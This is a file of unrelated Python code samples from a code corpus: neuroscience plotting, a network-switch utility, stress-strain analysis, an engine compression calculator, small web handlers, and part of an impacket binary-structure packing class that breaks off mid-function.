                      legend_show=True, legend_cond_show=True, percent_show=False,
                      cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 950))
ax[0].get_figure().savefig('figures/slides/Anova_Presented_PFC_PG.png', format='png')
ax = selectivity_plot(['Oscar', 'Gonzo'], 'PresentedStimulus', 'ConcatFactor',
                      ['PreDist'], ['PreDist', 'Gating', 'PostDist'], ['PFC'],
                      ylim_arg=ylim, selective_across=True, title='Information about Presented Stimulus (Sensory)\nPFC',
                      legend_show=True, legend_cond_show=True, percent_show=False,
                      cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 950))
ax[0].get_figure().savefig('figures/slides/Anova_Presented_PFC_P.png', format='png')
# sensory IT — same three-variant figure set as PFC, restricted to area IT.
ylim = (-1.0546353337905356, 6.621987030858086)
ax = selectivity_plot(['Oscar', 'Gonzo'], 'PresentedStimulus', 'ConcatFactor',
                      ['PreDist', 'Gating', 'PostDist'], ['PreDist', 'Gating', 'PostDist'], ['IT'],
                      ylim_arg=ylim, selective_across=True, title='Information about Presented Stimulus (Sensory)\nIT',
                      legend_show=False, legend_cond_show=True, percent_show=False,
                      cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 950))
ax[0].get_figure().savefig('figures/slides/Anova_Presented_IT_PGP.png', format='png')
# ylim = ax.get_ylim()
ax = selectivity_plot(['Oscar', 'Gonzo'], 'PresentedStimulus', 'ConcatFactor',
                      ['PreDist', 'Gating'], ['PreDist', 'Gating', 'PostDist'], ['IT'],
                      ylim_arg=ylim, selective_across=True, title='Information about Presented Stimulus (Sensory)\nIT',
                      legend_show=False, legend_cond_show=True, percent_show=False,
                      cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 950))
ax[0].get_figure().savefig('figures/slides/Anova_Presented_IT_PG.png', format='png')
ax = selectivity_plot(['Oscar', 'Gonzo'], 'PresentedStimulus', 'ConcatFactor',
                      ['PreDist'], ['PreDist', 'Gating', 'PostDist'], ['IT'],
                      ylim_arg=ylim, selective_across=True, title='Information about Presented Stimulus (Sensory)\nIT',
                      legend_show=False, legend_cond_show=True, percent_show=False,
                      cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 950))
ax[0].get_figure().savefig('figures/slides/Anova_Presented_IT_P.png', format='png')
# sensory Stri — same three-variant figure set, restricted to the striatum.
ylim = (-0.3037065344953298, 1.6670627280191153)
ax = selectivity_plot(['Oscar', 'Gonzo'], 'PresentedStimulus', 'ConcatFactor',
                      ['PreDist', 'Gating', 'PostDist'], ['PreDist', 'Gating', 'PostDist'], ['Stri'],
                      ylim_arg=ylim, selective_across=True, title='Information about Presented Stimulus (Sensory)\nStri',
                      legend_show=False, legend_cond_show=True, percent_show=False,
                      cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 950))
ax[0].get_figure().savefig('figures/slides/Anova_Presented_Stri_PGP.png', format='png')
# ylim = ax.get_ylim()
ax = selectivity_plot(['Oscar', 'Gonzo'], 'PresentedStimulus', 'ConcatFactor',
                      ['PreDist', 'Gating'], ['PreDist', 'Gating', 'PostDist'], ['Stri'],
                      ylim_arg=ylim, selective_across=True, title='Information about Presented Stimulus (Sensory)\nStri',
                      legend_show=False, legend_cond_show=True, percent_show=False,
                      cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 950))
ax[0].get_figure().savefig('figures/slides/Anova_Presented_Stri_PG.png', format='png')
ax = selectivity_plot(['Oscar', 'Gonzo'], 'PresentedStimulus', 'ConcatFactor',
                      ['PreDist'], ['PreDist', 'Gating', 'PostDist'], ['Stri'],
                      ylim_arg=ylim, selective_across=True, title='Information about Presented Stimulus (Sensory)\nStri',
                      legend_show=False, legend_cond_show=True, percent_show=False,
                      cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 950))
ax[0].get_figure().savefig('figures/slides/Anova_Presented_Stri_P.png', format='png')
# extended PFC — for each period, the presented-stimulus trace is drawn first
# (full alpha) and a "_Half" snapshot saved, then the base plot is re-created
# and the next-stimulus trace overlaid at reduced alpha (ax=ax) before saving
# the combined figure.
ylim = (-0.14969837984715206, 0.36930971214874475)
ax = selectivity_plot(['Oscar', 'Gonzo'], 'PresentedStimulusExtended', 'ConcatFactorExtended',
                      ['PreDist'], ['PreDist'], ['PFC'],
                      ylim_arg=ylim, selective_across=False, title='Extended Stimulus Information (PreDist)',
                      legend_show=False, legend_cond_show=True, percent_show=False,
                      cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 1900), ax2_y=(0, 1))
ax[0].get_figure().savefig('figures/slides/Anova_Extended_PFC_PreDist_Half.png', format='png')
ax = selectivity_plot(['Oscar', 'Gonzo'], 'PresentedStimulusExtended', 'ConcatFactorExtended',
                      ['PreDist'], ['PreDist'], ['PFC'],
                      ylim_arg=ylim, selective_across=False, title='Extended Stimulus Information (PreDist)',
                      legend_show=False, legend_cond_show=True, percent_show=False,
                      cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 1900), ax2_y=(0, 1))
ax = selectivity_plot(['Oscar', 'Gonzo'], 'NextStimulusExtended', 'ConcatFactorExtended',
                      ['PreDist'], ['PreDist'], ['PFC'],
                      ylim_arg=ylim, selective_across=False, title='Extended Stimulus Information (PreDist)',
                      legend_show=False, legend_cond_show=True, percent_show=False,
                      cluster_corrected=True, plot_nonzero=True, ax=ax, alpha=(0.35, 0.1), crop=(-50, 1900), ax2_y=(1, 1))
ax[0].get_figure().savefig('figures/slides/Anova_Extended_PFC_PreDist.png', format='png')
ylim = (-0.14410958260081336, 0.5219766476238107)
ax = selectivity_plot(['Oscar', 'Gonzo'], 'PresentedStimulusExtended', 'ConcatFactorExtended',
                      ['Gating'], ['Gating'], ['PFC'],
                      ylim_arg=ylim, selective_across=False, title='Extended Stimulus Information (Gating)',
                      legend_show=False, legend_cond_show=True, percent_show=False,
                      cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 1900), ax2_y=(0, 1))
ax = selectivity_plot(['Oscar', 'Gonzo'], 'NextStimulusExtended', 'ConcatFactorExtended',
                      ['Gating'], ['Gating'], ['PFC'],
                      ylim_arg=ylim, selective_across=False, title='Extended Stimulus Information (Gating)',
                      legend_show=False, legend_cond_show=True, percent_show=False,
                      cluster_corrected=True, plot_nonzero=True, ax=ax, alpha=(0.35, 0.1), crop=(-50, 1900), ax2_y=(1, 1))
ax[0].get_figure().savefig('figures/slides/Anova_Extended_PFC_Gating.png', format='png')
ylim = (-0.12770990132450838, 0.3507261498275955)
ax = selectivity_plot(['Oscar', 'Gonzo'], 'PresentedStimulusExtended', 'ConcatFactorExtended',
                      ['PostDist'], ['PostDist'], ['PFC'],
                      ylim_arg=ylim, selective_across=False, title='Extended Stimulus Information (PostDist)',
                      legend_show=False, legend_cond_show=True, percent_show=False,
                      cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 1900), ax2_y=(0, 1))
ax = selectivity_plot(['Oscar', 'Gonzo'], 'NextStimulusExtended', 'ConcatFactorExtended',
                      ['PostDist'], ['PostDist'], ['PFC'],
                      ylim_arg=ylim, selective_across=False, title='Extended Stimulus Information (PostDist)',
                      legend_show=False, legend_cond_show=True, percent_show=False,
                      cluster_corrected=True, plot_nonzero=True, ax=ax, alpha=(0.35, 0.1), crop=(-50, 1900), ax2_y=(1, 1))
ax[0].get_figure().savefig('figures/slides/Anova_Extended_PFC_PostDist.png', format='png')
# memory PFC — gated-stimulus (memory) selectivity with one saved figure per
# highlighted subset of task periods, sharing a fixed y-range.
ylim = (-0.24516717325616877, 1.855146281742199)
ax = selectivity_plot(['Oscar', 'Gonzo'], 'GatedStimulus', 'ConcatFactor',
                      ['PreDist', 'Gating', 'PostDist', 'Target'], ['PreDist', 'Gating', 'PostDist', 'Target'], ['PFC'],
                      ylim_arg=ylim, selective_across=True, title='Information about Gated Stimulus (Memory)\nPFC',
                      legend_show=True, legend_cond_show=True, percent_show=False,
                      cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 950))
ax[0].get_figure().savefig('figures/slides/Anova_Gated_PFC_PGPT.png', format='png')
# ylim = ax.get_ylim()
ax = selectivity_plot(['Oscar', 'Gonzo'], 'GatedStimulus', 'ConcatFactor',
                      ['PostDist', 'Target'], ['PreDist', 'Gating', 'PostDist', 'Target'], ['PFC'],
                      ylim_arg=ylim, selective_across=True, title='Information about Gated Stimulus (Memory)\nPFC',
                      legend_show=True, legend_cond_show=True, percent_show=False,
                      cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 950))
ax[0].get_figure().savefig('figures/slides/Anova_Gated_PFC_PT.png', format='png')
ax = selectivity_plot(['Oscar', 'Gonzo'], 'GatedStimulus', 'ConcatFactor',
                      ['Gating', 'PostDist'], ['PreDist', 'Gating', 'PostDist', 'Target'], ['PFC'],
                      ylim_arg=ylim, selective_across=True, title='Information about Gated Stimulus (Memory)\nPFC',
                      legend_show=True, legend_cond_show=True, percent_show=False,
                      cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 950))
ax[0].get_figure().savefig('figures/slides/Anova_Gated_PFC_GP.png', format='png')
ax = selectivity_plot(['Oscar', 'Gonzo'], 'GatedStimulus', 'ConcatFactor',
                      ['PreDist', 'Gating'], ['PreDist', 'Gating', 'PostDist', 'Target'], ['PFC'],
                      ylim_arg=ylim, selective_across=True, title='Information about Gated Stimulus (Memory)\nPFC',
                      legend_show=True, legend_cond_show=True, percent_show=False,
                      cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 950))
ax[0].get_figure().savefig('figures/slides/Anova_Gated_PFC_PG.png', format='png')
ax = selectivity_plot(['Oscar', 'Gonzo'], 'GatedStimulus', 'ConcatFactor',
                      ['PreDist'], ['PreDist', 'Gating', 'PostDist', 'Target'], ['PFC'],
                      ylim_arg=ylim, selective_across=True, title='Information about Gated Stimulus (Memory)\nPFC',
                      legend_show=True, legend_cond_show=True, percent_show=False,
                      cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 950))
ax[0].get_figure().savefig('figures/slides/Anova_Gated_PFC_P.png', format='png')
| StarcoderdataPython |
8150875 | #!/usr/bin/env python3
# Copyright 2019 Brocade Communications Systems LLC. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may also obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
:mod:`module_version_show` - PyFOS util to show the module version details
**************************************************************************
The :mod:`module_version_show` provides option to display supported module
versions.
This module is a standalone script that can be used to display all the
supported module versions.
* Inputs:
| Infrastructure options:
| -i,--ipaddr=IPADDR The IP address of FOS switch.
| -L,--login=LOGIN The login name.
| -P,--password=PASSWORD The password.
| -f,--vfid=VFID The VFID to which the request is directed to [OPTIONAL].
| -s,--secured=MODE The HTTPS mode "self" or "CA" [OPTIONAL].
| -v,--verbose Verbose mode[OPTIONAL].
* Outputs:
* Returns version details for all the supported modules from the switch.
"""
import sys
from pyfos import pyfos_auth
from pyfos import pyfos_util
from pyfos.pyfos_brocade_module_version import module_version
from pyfos.utils import brcd_util
def get_module_version_info(session):
    """Fetch the supported module-version details from the switch over *session*."""
    return module_version().get(session)
def main(argv):
    """Parse CLI args, query the module versions, print them, and log out."""
    parsed = brcd_util.parse(argv, module_version, [])
    session = brcd_util.getsession(parsed)
    versions = get_module_version_info(parsed['session'])
    pyfos_util.response_print(versions)
    pyfos_auth.logout(session)
if __name__ == "__main__":
    main(sys.argv[1:])  # run as a script, skipping the program name
| StarcoderdataPython |
160197 | import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import math
import warnings
warnings.filterwarnings(action='once')  # show each distinct warning only once
data = None;  # raw CSV test data; intended to be populated by initData()
matData = None;  # per-material summary table; intended to be populated by initData()
def initData(csvName):
    """Load the raw test CSV and create the empty material-summary table.

    Both results are stored in the module-level ``data`` and ``matData``
    globals so the other helpers in this module can see them.
    """
    # BUG FIX: without this `global` declaration the assignments below only
    # bound function locals, so the module-level names stayed None and every
    # other helper failed.
    global data, matData
    data = pd.read_csv(csvName)
    # NOTE(review): 'Reduced Diamter' keeps the original (misspelled) column
    # label in case external callers rely on it.
    matData = pd.DataFrame(columns=['Name','Diameter','Length','Reduced Diamter','Area','Reduced Area','UTS','Elastic Modulus','Total Fail Strain','Plastic Strain Fail','Elastic Strain Fail','Offset Yield'])
def addMaterial(matInfo):
    """Append one material record to the module-level summary table.

    *matInfo* must provide a value for every column of ``matData``;
    otherwise a message is printed and nothing is added.
    """
    expected = len(matData.columns)
    if len(matInfo) < expected:
        print("Not enough entries in matInfo")
        return
    matData.loc[len(matData)] = matInfo
def area(diameter):
    """Return the cross-sectional area of a circle with the given diameter."""
    radius = diameter / 2
    return math.pi * radius ** 2
def findUTS(key):
    """Return the ultimate tensile strength: the maximum of column *key* in the global data."""
    column = data[key]
    return max(column)
def getYoungsModulus(stress,strain,plot=False):
    # Brute-force search for the steepest well-fitting linear window in the
    # first half of the curve; the best slope is taken as Young's modulus.
    # Returns the modulus in the same units as the input stress.
    # NOTE(review): the comment below says "1/10 the number of data points",
    # but the code actually fits windows within the first *half* of the data.
    # finds the Young's Modulus by finding the largest linear slope between 1/10 the number of data points
    # returns the Young's Modulus in the same units as the input stress
    dummyData = pd.DataFrame(data={'x':strain,'y':stress})
    dummyData.dropna(inplace=True)
    x=np.array(dummyData['x'][:int(len(dummyData['x'])/2)])
    y=np.array(dummyData['y'][:int(len(dummyData['x'])/2)])
    numPts = len(x)
    minFitLength = 8  # smallest window (in points) allowed for a fit
    chi = 0
    chi_min = 10000  # running best sum-of-squares residual
    i_best=0
    j_best=0
    m_best=0  # running best (steepest) slope
    # Try every window [i, j) of at least minFitLength points.
    for i in range(numPts - minFitLength):
        for j in range(i+minFitLength, numPts):
            coefs = np.polyfit(x[i:j],y[i:j],1)
            y_lin = x * coefs[0] + coefs[1]
            chi=0
            for k in range(i,j):
                chi += (y_lin[k] - y[k])**2
            # Keep a window only if it both fits better AND is steeper than
            # the current best.
            if chi < chi_min and coefs[0] > m_best:
                i_best = i
                j_best = j
                chi_min = chi
                m_best = coefs[0]
    # Refit the winning window (for the optional overlay plot below).
    coefs = np.polyfit(x[i_best:j_best],y[i_best:j_best],1)
    y_lin = x[i_best:j_best] * coefs[0] + coefs[1]
    if(plot):
        plt.plot(x,y,'ro')
        plt.plot(x[i_best:j_best],y_lin,'b-')
    # NOTE(review): this print assumes MPa units; the function itself is unit-agnostic.
    print("Young's Modulus (MPa): " + str(m_best))
    return m_best
def findElasticModulus(stressKey,strainKey):
    """Compute the elastic modulus from two columns of the global raw data."""
    return getYoungsModulus(data[stressKey], data[strainKey])
def getFailure(stress):
    """Locate the point of failure: the index just before the largest
    two-sample *drop* in the stress sequence.

    Returns ``index - 2`` of the drop's end point; if the sequence never
    drops, this is -2 (matching the original behavior).
    """
    biggest_drop = 0
    drop_end = 0
    for idx in range(2, len(stress)):
        delta = stress[idx] - stress[idx - 2]
        if delta < 0 and abs(delta) > biggest_drop:
            biggest_drop = abs(delta)
            drop_end = idx
    return drop_end - 2
def findFailure(stressKey,strainKey):
    """Return the strain value at the failure index of the given stress column."""
    failure_index = getFailure(data[stressKey])
    return data[strainKey][failure_index]
def findPlasticElasticFailureStrain(stressKey,strainKey,elasticModulus,totFailStrain):
    """Split the total failure strain into elastic and plastic components.

    Returns ``[elastic_strain, plastic_strain]`` where the elastic part is
    the stress at failure divided by *elasticModulus*.
    """
    # BUG FIX: the original called findFailure(data[stressKey]), but
    # findFailure takes column *keys* (and two of them); getFailure is the
    # helper that accepts the raw stress sequence and returns the index.
    failIndex = getFailure(data[stressKey])
    failStress = data[stressKey][failIndex]
    # NOTE(review): strainKey is accepted but unused; kept for interface
    # compatibility with existing callers.
    elasticStrain = failStress / elasticModulus
    return [elasticStrain, totFailStrain - elasticStrain]
def getYieldStress(strain, stress, offset, E):
    # Attempt at an offset-yield calculation: intersect the measured curve
    # with the offset line y = E*(x - offset).
    x = strain
    y = stress
    # Keep only points where both strain and stress are positive (pandas
    # boolean masks align by index, so chaining these works on Series).
    x_n = x[x>0]
    x_n = x_n[y>0]
    y_n = y[x>0]
    y_n = y_n[y>0]
    dummyData = pd.DataFrame(data={'x':x_n,'y':y_n})
    dummyData.dropna(inplace=True)
    # Restrict to the first half of the cleaned data.
    x=np.array(dummyData['x'][:int(len(dummyData['x'])/2)])
    y=np.array(dummyData['y'][:int(len(dummyData['x'])/2)])
    f=lambda x : E*(x-offset)  # the offset line
    u=np.linspace(0,0.2,100)
    v=f(u)  # offset-line stresses sampled over strain 0..0.2
    minDiff = 1000
    index = -1
    # NOTE(review): the comparison below is *signed* (no abs), so it drifts
    # toward the most negative difference rather than the closest point, and
    # `index` is recorded but never used — suspected bugs; intent unclear.
    for i in range(len(y)):
        for j in range(len(v)):
            if y[i]-v[j] < minDiff:
                minDiff = y[i]-v[j]
                index = j
                print(v[j])
    # NOTE(review): returns v[j] where j is the leftover loop variable (the
    # last sampled point), not v[index]; confirm intended behavior.
    return v[j]
def findYieldStress(stressKey,strainKey,elasticModulus,offset=.002):
    """Look up the offset-yield stress from two columns of the global data."""
    return getYieldStress(data[strainKey], data[stressKey], offset, elasticModulus)
def writeOut(fName):
    """Write one four-line record (type, diameter, length, modulus) per material row."""
    # NOTE(review): the keys below ('Type', 'Diameter (mm)', 'Length (m)',
    # "Young's Modulus (MPa)") do not match the columns created in initData
    # ('Name', 'Diameter', 'Length', 'Elastic Modulus'); confirm which schema
    # matData actually carries before relying on this function.
    # Use a context manager so the file is closed even if a lookup raises.
    with open(fName, 'w') as f:
        for i in range(matData.shape[0]):
            f.write(matData['Type'][i]+'\n')
            f.write(str(matData['Diameter (mm)'][i])+'\n')
            f.write(str(matData['Length (m)'][i])+'\n')
            f.write(str(matData["Young's Modulus (MPa)"][i])+'\n')
def plotData(stressKeys,strainKeys,names,totalFailureStrain,fName=None):
    """Plot stress-strain curves for several tests on a single set of axes.

    Each curve keeps only positive stress/strain points before the sample
    whose strain equals *totalFailureStrain*; pass *fName* to also save
    the figure.
    """
    # BUG FIX: the original `for i,xKey,yKey in enumerate(zip(...))` raised
    # ValueError because enumerate yields (index, (xKey, yKey)) pairs.
    for i, (xKey, yKey) in enumerate(zip(strainKeys, stressKeys)):
        x = data[xKey]
        y = data[yKey]
        # Last index whose strain matches the failure strain (0 if none).
        index = 0
        for j in range(len(x)):
            if x[j] == totalFailureStrain:
                index = j
        # BUG FIX: build an ndarray — the original Python list did not
        # support the xy[:, 0] column slicing used below.
        xy = np.array([[a, b] for k, (a, b) in enumerate(zip(x, y)) if a > 0 and b > 0 and k < index])
        plt.plot(xy[:, 0], xy[:, 1], label=names[i])
    plt.xlabel('Strain')
    plt.ylabel('Stress')
    plt.title('Stress-Strain Curve')
    plt.legend(loc=(1.05,.65))
    if fName is not None:
        plt.savefig(fName)
| StarcoderdataPython |
4949815 | <gh_stars>0
# Dynamic Compression Ratio calculator (interactive console script).
import math as m
borein=input("Cylinder Bore in mm? ")
strokein=input("Stroke in mm? ")
ccvolin=input("Combustion chamber volumein CCs? ")
bore=float(borein)
stroke=float(strokein)
ccvol=float(ccvolin)
#Converting mm to cm, volume(draw) in CCs
bore=bore/10
stroke=stroke/10
draw=(m.pi*((bore/2)**2))*stroke  # swept volume in cm^3 (CCs)
print(bore, stroke, ccvol, draw,"\n")
timingin=input("Valve closing in degrees after BTDC? ")
timing=int(timingin)
short_stroke=0
stroke2=float(stroke)  # NOTE(review): stroke2 is assigned but never used
#Calculates short stroke (effective stroke after intake-valve closing)
if timing<=90:
    timing2=m.radians(timing)
    print("\n",timing2," Valve closing in radians")
    print(m.sin(timing2))
    short_stroke=stroke-((m.sin(timing2))*(stroke/2))
    print(short_stroke*10," Effective stroke length in mm")
elif timing>90:
    timing3=m.radians(timing)
    # NOTE(review): for angles > 90° this takes sin of the full angle; confirm
    # the intended crank geometry (possibly sin(timing - 90) was meant).
    print("\n",timing3, " Valve closing in radians")
    print(m.sin(timing3))
    short_stroke=stroke-(stroke/2)-((m.sin(timing3))*(stroke/2))
    print(short_stroke*10," Effective stroke length in mm")
print("\n Almost done! \n")
#Calculates CR & DCR
# NOTE(review): 1/regcr below is draw/ccvol; the conventional compression
# ratio is (draw + ccvol)/ccvol — confirm whether the "+ ccvol" term was
# intentionally omitted.
regcr=ccvol/draw
sdraw=short_stroke*(m.pi*((bore/2)**2))  # shortened (effective) swept volume
dyncr=ccvol/sdraw
print(sdraw," Shortened draw \n")
print(1/regcr,":1"," Regular Compression Ratio \n")
print(1/dyncr,":1"," Dynamic Compression Ratio \n")
input("Exit?")
| StarcoderdataPython |
5035581 | from django.http import HttpResponse
from django.views.generic import View
class BaseView(View):
    """Minimal Django view that answers GET with a fixed plain-text body."""

    def get(self, *args, **kwargs):
        body = "app 3"
        return HttpResponse(body)
| StarcoderdataPython |
6500023 | # coding: utf8
# Author: <NAME> (~wy)
# Date: 2017
# Big Numbers
def problem48():
    """Project Euler 48: last ten digits of 1^1 + 2^2 + ... + 1000^1000."""
    mod = 10 ** 10
    # pow(i, i, mod) reduces every term modulo 10^10 as it is computed,
    # avoiding the thousand-digit intermediates the original built up
    # before its final single reduction.
    return sum(pow(i, i, mod) for i in range(1, 1001)) % mod
print(problem48()) | StarcoderdataPython |
1819360 | import tornado
import tornado.websocket
from tornado.web import RequestHandler
class HelloWorld(RequestHandler):
    """Respond to GET with the classic greeting as the response body."""

    def get(self):
        """Write 'Hello, world!' back to the client."""
        greeting = "Hello, world!"
        self.write(greeting)
class WSHandler(tornado.websocket.WebSocketHandler):
    """Websocket handler that greets new clients and logs all traffic."""

    def open(self):
        """A client connected: log it and send a greeting frame."""
        print('new connection')
        self.write_message("Hello World")

    def on_message(self, message):
        """Log every inbound frame."""
        print('message received %s' % message)

    def on_close(self):
        """Log when the client disconnects."""
        print('connection closed')
9779893 | #!/usr/bin/env python3
# Copyright (c) 2003-2012 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
"""
Stripped down version of: https://github.com/CoreSecurity/impacket/blob/python3/impacket/structure.py
with modifications in the function dump(...).
"""
from struct import pack, unpack, calcsize
# Trying to support both Python 2 and 3
import sys
# Version shims: b() coerces text to bytes (latin-1) and buildStr() coerces
# bytes back to str; both are identity functions on Python 2.
if sys.version_info[0] == 2:
    # Python 2.x
    def b(x):
        return x
    def buildStr(x):
        return x
else:
    import codecs
    def b(x):
        # Encode str -> bytes with latin-1 (a 1:1 byte mapping); pass bytes through.
        if isinstance(x, bytes) is False:
            return codecs.latin_1_encode(x)[0]
        return x
    def buildStr(x):
        # Decode bytes -> str one byte per character; pass str through.
        if isinstance(x, bytes):
            return "".join(map(chr,x))
        else:
            return x
class Structure:
""" sublcasses can define commonHdr and/or structure.
each of them is an tuple of either two: (fieldName, format) or three: (fieldName, ':', class) fields.
[it can't be a dictionary, because order is important]
where format specifies how the data in the field will be converted to/from bytes (string)
class is the class to use when unpacking ':' fields.
each field can only contain one value (or an array of values for *)
i.e. struct.pack('Hl',1,2) is valid, but format specifier 'Hl' is not (you must use 2 dfferent fields)
format specifiers:
specifiers from module pack can be used with the same format
see struct.__doc__ (pack/unpack is finally called)
x [padding byte]
c [character]
b [signed byte]
B [unsigned byte]
h [signed short]
H [unsigned short]
l [signed long]
L [unsigned long]
i [signed integer]
I [unsigned integer]
q [signed long long (quad)]
Q [unsigned long long (quad)]
s [string (array of chars), must be preceded with length in format specifier, padded with zeros]
p [pascal string (includes byte count), must be preceded with length in format specifier, padded with zeros]
f [float]
d [double]
= [native byte ordering, size and alignment]
@ [native byte ordering, standard size and alignment]
! [network byte ordering]
< [little endian]
> [big endian]
usual printf like specifiers can be used (if started with %)
[not recommeneded, there is no why to unpack this]
%08x will output an 8 bytes hex
%s will output a string
%s\\x00 will output a NUL terminated string
%d%d will output 2 decimal digits (against the very same specification of Structure)
...
some additional format specifiers:
: just copy the bytes from the field into the output string (input may be string, other structure, or anything responding to __str__()) (for unpacking, all what's left is returned)
z same as :, but adds a NUL byte at the end (asciiz) (for unpacking the first NUL byte is used as terminator) [asciiz string]
u same as z, but adds two NUL bytes at the end (after padding to an even size with NULs). (same for unpacking) [unicode string]
w DCE-RPC/NDR string (it's a macro for [ '<L=(len(field)+1)/2','"\\x00\\x00\\x00\\x00','<L=(len(field)+1)/2',':' ]
?-field length of field named 'field', formated as specified with ? ('?' may be '!H' for example). The input value overrides the real length
?1*?2 array of elements. Each formated as '?2', the number of elements in the array is stored as specified by '?1' (?1 is optional, or can also be a constant (number), for unpacking)
'xxxx literal xxxx (field's value doesn't change the output. quotes must not be closed or escaped)
"xxxx literal xxxx (field's value doesn't change the output. quotes must not be closed or escaped)
_ will not pack the field. Accepts a third argument, which is an unpack code. See _Test_UnpackCode for an example
?=packcode will evaluate packcode in the context of the structure, and pack the result as specified by ?. Unpacking is made plain
?&fieldname "Address of field fieldname".
For packing it will simply pack the id() of fieldname. Or use 0 if fieldname doesn't exists.
For unpacking, it's used to know weather fieldname has to be unpacked or not, i.e. by adding a & field you turn another field (fieldname) in an optional field.
"""
commonHdr = ()
structure = ()
debug = 0
def __init__(self, data = None, alignment = 0):
if not hasattr(self, 'alignment'):
self.alignment = alignment
self.fields = {}
self.rawData = data
if data is not None:
self.fromString(data)
else:
self.data = None
def packField(self, fieldName, format = None):
if self.debug:
print("packField( %s | %s )" % (fieldName, format))
if format is None:
format = self.formatForField(fieldName)
if fieldName in self.fields:
ans = self.pack(format, self.fields[fieldName], field = fieldName)
else:
ans = self.pack(format, None, field = fieldName)
if self.debug:
print("\tanswer %r" % ans)
return ans
def getData(self):
if self.data is not None:
return self.data
data = b''
for field in self.commonHdr+self.structure:
try:
data += b(self.packField(field[0], field[1]))
except Exception as e:
if field[0] in self.fields:
e.args += ("When packing field '%s | %s | %r' in %s" % (field[0], field[1], self[field[0]], self.__class__),)
else:
e.args += ("When packing field '%s | %s' in %s" % (field[0], field[1], self.__class__),)
raise
if self.alignment:
if len(data) % self.alignment:
data += b('\x00'*self.alignment)[:-(len(data) % self.alignment)]
#if len(data) % self.alignment: data += ('\x00'*self.alignment)[:-(len(data) % self.alignment)]
if isinstance(data,str):
return data
return buildStr(data)
def fromString(self, data):
self.rawData = data
data = buildStr(data)
for field in self.commonHdr+self.structure:
if self.debug:
print("fromString( %s | %s | %r )" % (field[0], field[1], data))
size = self.calcUnpackSize(field[1], data, field[0])
if self.debug:
print(" size = %d" % size)
dataClassOrCode = str
if len(field) > 2:
dataClassOrCode = field[2]
try:
self[field[0]] = self.unpack(field[1], data[:size], dataClassOrCode = dataClassOrCode, field = field[0])
except Exception as e:
e.args += ("When unpacking field '%s | %s | %r[:%d]'" % (field[0], field[1], data, size),)
raise
size = self.calcPackSize(field[1], self[field[0]], field[0])
if self.alignment and size % self.alignment:
size += self.alignment - (size % self.alignment)
data = data[size:]
return self
def __setitem__(self, key, value):
self.fields[key] = value
self.data = None # force recompute
def __getitem__(self, key):
return self.fields[key]
def __delitem__(self, key):
del self.fields[key]
def __str__(self):
return self.getData()
def __len__(self):
# XXX: improve
return len(self.getData())
def pack(self, format, data, field = None):
if self.debug:
print(" pack( %s | %r | %s)" % (format, data, field))
if field:
addressField = self.findAddressFieldFor(field)
if (addressField is not None) and (data is None):
return b''
# void specifier
if format[:1] == '_':
return b''
# quote specifier
if format[:1] == "'" or format[:1] == '"':
return b(format[1:])
# code specifier
two = format.split('=')
if len(two) >= 2:
try:
return self.pack(two[0], data)
except:
fields = {'self':self}
fields.update(self.fields)
return self.pack(two[0], eval(two[1], {}, fields))
# address specifier
two = format.split('&')
if len(two) == 2:
try:
return self.pack(two[0], data)
except:
if (two[1] in self.fields) and (self[two[1]] is not None):
return self.pack(two[0], id(self[two[1]]) & ((1<<(calcsize(two[0])*8))-1) )
else:
return self.pack(two[0], 0)
# length specifier
two = format.split('-')
if len(two) == 2:
try:
return self.pack(two[0],data)
except:
return self.pack(two[0], self.calcPackFieldSize(two[1]))
# array specifier
two = format.split('*')
if len(two) == 2:
answer = b''
for each in data:
answer += self.pack(two[1], each)
if two[0]:
if two[0].isdigit():
if int(two[0]) != len(data):
raise Exception("Array field has a constant size, and it doesn't match the actual value")
else:
return self.pack(two[0], len(data))+answer
return answer
# "printf" string specifier
if format[:1] == '%':
# format string like specifier
return format % data
# asciiz specifier
if format[:1] == 'z':
return b(data)+b'\0'
# unicode specifier
if format[:1] == 'u':
return b(data)+b'\0\0' + (len(data) & 1 and b'\0' or b'')
# DCE-RPC/NDR string specifier
if format[:1] == 'w':
if len(data) == 0:
data = '\0\0'
elif len(data) % 2:
data += '\0'
l = pack('<L', int(len(data)/2))
l = buildStr(l)
return b('%s\0\0\0\0%s%s' % (l,l,data))
if data is None:
raise Exception("Trying to pack None")
# literal specifier
if format[:1] == ':':
# Inner Structures?
if isinstance(data,Structure):
return b(data.getData())
return b(data)
# struct like specifier
if isinstance(data, str):
return pack(format, b(data))
else:
return pack(format, data)
def unpack(self, format, data, dataClassOrCode = str, field = None):
if self.debug:
print(" unpack( %s | %r )" % (format, data))
if field:
